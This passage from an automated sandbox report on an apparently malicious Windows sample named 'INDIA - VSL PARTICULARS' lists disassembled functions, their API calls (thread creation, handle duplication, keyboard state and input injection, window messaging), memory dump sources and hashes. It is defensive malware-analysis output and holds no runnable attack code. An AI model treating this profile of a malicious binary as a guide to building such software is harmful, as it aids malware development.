                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu$\VH
                              • API String ID: 3164766367-2432546070
                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                              Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Msctls_Progress32
                              • API String ID: 3850602802-3636473452
                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                              Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                              • String ID:
                              • API String ID: 3985565216-0
                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                              Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _malloc.LIBCMT ref: 0041F707
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _free.LIBCMT ref: 0041F71A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID: [B
                              • API String ID: 1020059152-632041663
                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                              Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                              • __calloc_crt.LIBCMT ref: 00413DB0
                              • __getptd.LIBCMT ref: 00413DBD
                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                              • _free.LIBCMT ref: 00413E07
                              • __dosmaperr.LIBCMT ref: 00413E12
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                              Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                              Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 259663610-0
                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                              • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                              Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                              Download Yara Rule
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004302E6
                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                              • GetClientRect.USER32(?,?), ref: 00430364
                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                              • GetWindowRect.USER32(?,?), ref: 004303C3
                              • ScreenToClient.USER32(?,?), ref: 004303EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Rect$Client$Window$MetricsScreenSystem
                              • String ID:
                              • API String ID: 3220332590-0
                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                              Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _malloc_wcslen$_strcat_wcscpy
                              • String ID:
                              • API String ID: 1612042205-0
                              • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                              • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                              Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: >$U$\
                              • API String ID: 2666721431-237099441
                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                              Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C570
                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$InputSend
                              • String ID:
                              • API String ID: 2221674350-0
                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                              Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscpy$_wcscat
                              • String ID:
                              • API String ID: 2037614760-0
                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                              Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$AllocClearErrorLastString
                              • String ID:
                              • API String ID: 960795272-0
                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                              Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 4189319755-0
                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                              Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow$InvalidateRect
                              • String ID:
                              • API String ID: 1976402638-0
                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
